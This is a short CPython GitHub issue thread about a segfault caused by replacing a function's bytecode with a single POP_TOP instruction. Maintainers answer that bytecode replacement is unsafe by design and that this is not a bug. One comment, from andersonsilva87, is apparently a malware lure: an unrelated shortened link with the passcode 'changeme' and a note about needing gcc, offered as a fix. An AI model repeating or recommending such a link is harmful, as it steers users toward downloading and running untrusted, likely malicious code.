### ISSUE TITLE
Segmentation Fault When Running Bytecode Modification Code on Python 3.13.0b1

### ISSUE THREAD

**Issue by zzl261004** [python/cpython#123731]
# Crash report

### What happened?

```python
import dis
func = lambda: None
func.__code__ = func.__code__.replace(co_code=bytes([dis.opmap['POP_TOP'], 0]))
func()
```

### CPython versions tested on:

CPython main branch

### Operating systems tested on:

Linux

### Output from running 'python -VV' on the command line:

Segmentation fault (core dumped)

**Comment by andersonsilva87** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by picnixz** [comment]
What are you trying to do? Why do you want to pop from the stack if there is nothing that was pushed on top of the stack?

**Comment by JelleZijlstra** [comment]
Replacing bytecode is inherently unsafe and there are many ways to crash the interpreter this way. This is not a bug.
